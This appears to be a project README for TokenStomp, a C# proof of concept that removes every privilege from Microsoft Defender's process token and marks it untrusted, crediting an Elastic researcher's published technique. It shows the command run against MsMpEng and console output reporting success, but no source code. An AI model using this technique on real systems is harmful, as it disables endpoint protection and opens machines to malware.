Awesome
TokenStomp
C# POC for the token privilege removal flaw reported by @GabrielLandau at Elastic.
C:\Users\Mrtn>TokenStomp.exe MsMpEng
________ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄ ▄ ▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄▄▄
(____ / <| █ █ █ █ █ █ █ █ █ █ █ █ █ █▄█ █ █
(___ / <| █▄ ▄█ ▄ █ █▄█ █ ▄▄▄█ █▄█ █ ▄▄▄▄▄█▄ ▄█ ▄ █ █ █ ▄ █
(__ / <`-------. █ █ █ █ █ █ ▄█ █▄▄▄█ █ █▄▄▄▄▄ █ █ █ █ █ █ █ █▄█ █
/ `. ^^^^^ | \ █ █ █ █▄█ █ █▄█ ▄▄▄█ ▄ █▄▄▄▄▄ █ █ █ █ █▄█ █ ▄ ▄ █ ▄▄▄█
| \---------' | █ █ █ █ ▄ █ █▄▄▄█ █ █ █▄▄▄▄▄█ █ █ █ █ █ ██▄██ █ █
|______|___________/] █▄▄▄█ █▄▄▄▄▄▄▄█▄▄▄█ █▄█▄▄▄▄▄▄▄█▄█ █▄▄█▄▄▄▄▄▄▄█ █▄▄▄█ █▄▄▄▄▄▄▄█▄█ █▄█▄▄▄█
[▄▄▄▄▄|`-.▄▄▄▄▄▄▄▄▄] Implemented by @Mrtn9 - Technique by @GabrielLandau
[*] Found MsMpEng with pid 4988
[*] Got handle to process
[*] Successfully opened process token
[*] Got token information
[*] Found 14 privileges in token
[*] Successfully removed 14 of 14 privileges from token
[*] Successfully set token untrusted
C:\Users\Mrtn>
Credits
- This wonderful blogpost by Gabriel Landau over at Elastic: Sandboxing Antimalware Products for Fun and Profit
- This C++ implementation by Sudheer Varma (which I wish I saw before writing my implementation...): KillDefender